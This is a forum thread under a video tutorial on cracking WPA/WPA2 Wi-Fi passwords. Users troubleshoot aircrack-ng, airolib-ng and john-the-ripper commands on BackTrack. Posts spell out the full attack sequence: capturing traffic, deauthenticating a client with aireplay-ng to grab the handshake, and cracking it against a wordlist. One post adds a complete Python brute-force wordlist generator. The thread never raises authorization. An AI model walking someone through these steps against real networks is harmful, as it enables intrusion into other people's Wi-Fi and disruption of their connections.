[Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)

[Filibuster]

thanks 4 the gr8 explanation but the proplem is that i don't have an idea how to install the dictionery (theargonlistver) nor the aircrack-ng suite please help!!!!!!!!!!

[g0tmi1k]

thanks 4 the gr8 explanation but the proplem is that i don't have an idea how to install the dictionery (theargonlistver) nor the aircrack-ng suite please help!!!!!!!!!!

Backtrack comes with Aircrack-ng already installed.
Download theargonlistver, extract it...
...then

Code:

  Where it says: /root/tools/dictionaries/g0tmi1k.lst
Replace it with: /where/ever/you/extract/the/theargonlistver/to.txt

[forrest]

when I run the following command:
# john --incremental:alpha --stdout | aircrack-ng -a 2 -b 00:11:22:33:44:55 -w - /root/wpa2*.cap
it says......
Opening /root/wpa2-01.cap
me@BT4:/pentest/passwords/jtr# Reading packets, please wait...

I tried to run john the ripper bit it give me an error message like above. I don't know what's the problem. The program (John the ripper) writes "Reading packets, please wait..." after that nothing happen. I used BT4 R1 Live CD.
Sorry but I'm a beginner.

[g0tmi1k]

This looks to me that it works:

Code:

Example
john
./john --incremental:alpha --stdout | aircrack-ng -a 2 -b 00:0D:93:EB:B0:8C -w - /pentest/wireless/aircrack-ng/test/wpa.cap

Yours
john
./john --incremental:alpha --stdout | aircrack-ng -a 2 -b 00:11:22:33:44:55 -w - /root/wpa2*.cap

I think you're just missing "./"

[rent2]

Hello g0tmi1k, nice tut, but i got stuck as you can tell from my code below, any help/tip would be appreciated.

1. airmon-ng start wlan0
   
2. airodump-ng mon0
3. airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
   
4. aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
   
5. 1. airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
6. kate ~/essid
7. airolib-ng crackwpa --import essid ~/essid
8. airolib-ng crackwpa --stats
9. airolib-ng crackwpa --clean all
10. airolib-ng crackwpa --batch
11. airolib-ng crackwpa --verify all
    
12. aircrack-ng -r crackwpa output*.cap[COLOR=Red][I]

Code:

root@bt:~# airodump-ng --bssid target ID -c 11 -w output mon0

root@bt:~# airolib-ng crackwpa --import passwd /root/tools/dictionaries/TARGETNAME.lst
Database <crackwpa> does not already exist, creating it...
Database <crackwpa> successfully created
Could not open file/stream for reading.
root@bt:~#

[Checkers]

Hello g0tmilk, I'm having a small problem. When I run airodump-ng mon0 I get the following:



Any idea what's going on? When I'm not running Backtrack 4 R2 I only pick up Lompo, Other Network (my wireless), and my neighbors. Also, my card supports injection. I'm not sure which one to choose since my network isn't even listed.

Note: Lompo is a WiFi where you need to open up your web browser to log in.

[Checkers]

Hello g0tmi1k, nice tut, but i got stuck as you can tell from my code below, any help/tip would be appreciated.

1. airmon-ng start wlan0
   
2. airodump-ng mon0
3. airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
   
4. aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
   
5. 1. airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
6. kate ~/essid
7. airolib-ng crackwpa --import essid ~/essid
8. airolib-ng crackwpa --stats
9. airolib-ng crackwpa --clean all
10. airolib-ng crackwpa --batch
11. airolib-ng crackwpa --verify all
    
12. aircrack-ng -r crackwpa output*.cap[COLOR=Red][I]

Code:

root@bt:~# airodump-ng --bssid target ID -c 11 -w output mon0

root@bt:~# airolib-ng crackwpa --import passwd /root/tools/dictionaries/TARGETNAME.lst
Database <crackwpa> does not already exist, creating it...
Database <crackwpa> successfully created
Could not open file/stream for reading.
root@bt:~#

I'm also having the same problem. Tell me how to fix it when you find out what's wrong ok?

[Jimmy87]

Checkers, what's wrong is that you probably aren't pointing airolib to a password list that exists. Are you trying to point it to "g0tmi1k.lst"?

Are you using the exact same input as rent2? (TARGETNAME.lst)

[ignored]

I'm also having the same problem. Tell me how to fix it when you find out what's wrong ok?

Problably you are typing the wrong path to your dictionary (do you even have one?).

This is copied from the FAQ.

I'm new to linux, is BackTrack a good place to start ?
Sorry, the simple answer to that is no.

BackTrack is a highly specialized distro, where a lot of normal tasks are not done automatically for you as they are in a mainstream distro.

Our best advice if you wish to start off using linux with BackTrack as your first linux operating system, is don't.

Start off by downloading a copy of Kubuntu (as it is a similar base operating system to BackTrack) boot into that and force yourself to do everything you are used to doing on a daily basis using that, preferably spending most of your time using the command line tools. When and only when you can perform all of those daily tasks without having to look-up the commands should you move to BackTrack.

Please don't take this as us saying you shouldn't use BackTrack, take it as friendly advice that you are letting yourself in for a whole world of pain and frustration if you are not fully comfortable performing administration of your own linux machine before you start with Backtrack.

[poya22]

hi
this is a simple password generator in python language that also make split the large file to small files and it can calculate all types of passwords such as numberic or cappital or lowercase or Symbols or mixture of those.
copy all text in text file and change it to **any file name.py** for example "dicmaker.py" and you can run in backtrack with this Command

Code:

python dicmaker.py

also you can run in windows if install (python-2.6.4.msi)that you can find in net

Code:

#!/usr/bin/python

# it is a simple password generator in python language
# it can calculate all types of passwords such as numberic or cappital or lowercase or Symbols or mixture of those
# author : bahman tak (shellcode)

import os
import time
filename = 0

path = raw_input('''                     ===================================        
                    Choose Your Folder To Save Resaults
                         ===================================
                        Something Like This
                      (C:\ali\zahra\    (in windows)
                                 /etc/ali/zahra/   (In Linux)
            Enter Your Path :''')



f=open(path+'wordlist-' + str(filename) + '.txt', 'w')

def select(items, n):
    if n==0: yield []
    else:
        for i in xrange(len(items)):
            for ss in select(items, n-1):
                yield [items[i]]+ss


choice = 0
while int(choice) not in range(1,16):            #Get Type Of Wordlist From User
    choice = raw_input(''' 
            Numbers:1
                Caps : 2
                Lowercase:3
            Symbols:4
            Caps + Numbers:5
            Caps + Lowercase:6
            Caps + Symbols:7
            Lowercase + Numbers:8
            Lowercase + Symbols:9
            Symbols + Numbers:10
            Lowercase + Numbers + Cappital:11
            Lowercase + Numbers + Symbols:12
            Lowercase + Cappitals + Symbols :13
            Numbers + Cappitals + Symbols:14
            Lowercase + Numbers + Cappitals + Symbols:15
            
            
            Enter Your Option:''')

choice = int(choice)
            
L = range(97,123)                        # Range of Lowercase ASCII Codes
N = range(48,58)                        # Range of Numbers ASCII Codes
C = range(65,91)                        # Range of Cappital ASCII Codes
S = range(33,48)+range(58,65)+range(91,97)+range(123,127)     # Range of typicall Symbols ASCII Codes
LS = SL = L + S                            # Mixture of Lowercase & Symbols
LN = NL = L + N                            # Mixture of Lowercase & Numbers
CN = NC = C + N                            # Mixture of Cappitals & Numbers
LC = CL = L + C                            # Mixture of Lowecase & Cappitals
NS = SN = N + S                            # Mixture of Numbers & Symbols
CS = SC = C + S                            # Mixture of Cappitals & Symbols
LNC = L + N + C
LNS = L + N + S
LCS = L + C + S
NCS = N + C + S
LNCS = L + N + C + S

dic = {'1':N , '2':C , '3':L , '4':S , '5':CN , '6':CL , '7':CS , '8':LN , '9':LS , '10':SN , '11':LNC , '12':LNS , '13':LCS , '14':NCS , '15':LNCS}

biglist = dic[str(int(choice))]
big = [chr(x) for x in dic[str(int(choice))]]

MIN = raw_input("What is the min size of the word? ")
MIN = int(MIN)
MAX = raw_input("What is the max size of the word? ")
MAX = int(MAX)
MAX_SIZE_MB = input('Enter Your Size Per Text File(MB):')
MAX_SIZE_BYTES = MAX_SIZE_MB * 1024 * 1024
HOW_OFTEN_CHECK = 1000
count = 0
START_TIME = time.time()
for i in range(MIN,MAX+1):
    for s in select(big,i):
        count += 1
        f.write(''.join(s) + '\n')
        if count >= HOW_OFTEN_CHECK:
            size = os.path.getsize('wordlist-' + str(filename) + '.txt')
            if size > MAX_SIZE_BYTES:
                f.close()
                filename += 1
                f=open('wordlist-' + str(filename) + '.txt', 'w')
                count = 0
                print 'New File. Current word: ', ''.join(s)

f.close()
END_TIME = time.time()
print 'Time it took to compute files:', END_TIME - START_TIME, 'seconds'

you can edit this line for change the numbers of 0,1,2,3,4,5,6,7,8,9 to any number that you want

Code:

N = range(48,58)  # Range of Numbers ASCII Codes 0,1,2,3,4,5,6,7,8,9
N = range(49,58)  # Range of Numbers ASCII Codes 1,2,3,4,5,6,7,8,9
N = range(50,58)  # Range of Numbers ASCII Codes 2,3,4,5,6,7,8,9

if you want begin worldlist number form 111111111.... you must add +1 to this line like this:

Code:

N = range(48+1,58)

in last line you can select size for per text file in MB
THANK FOR GOTMILK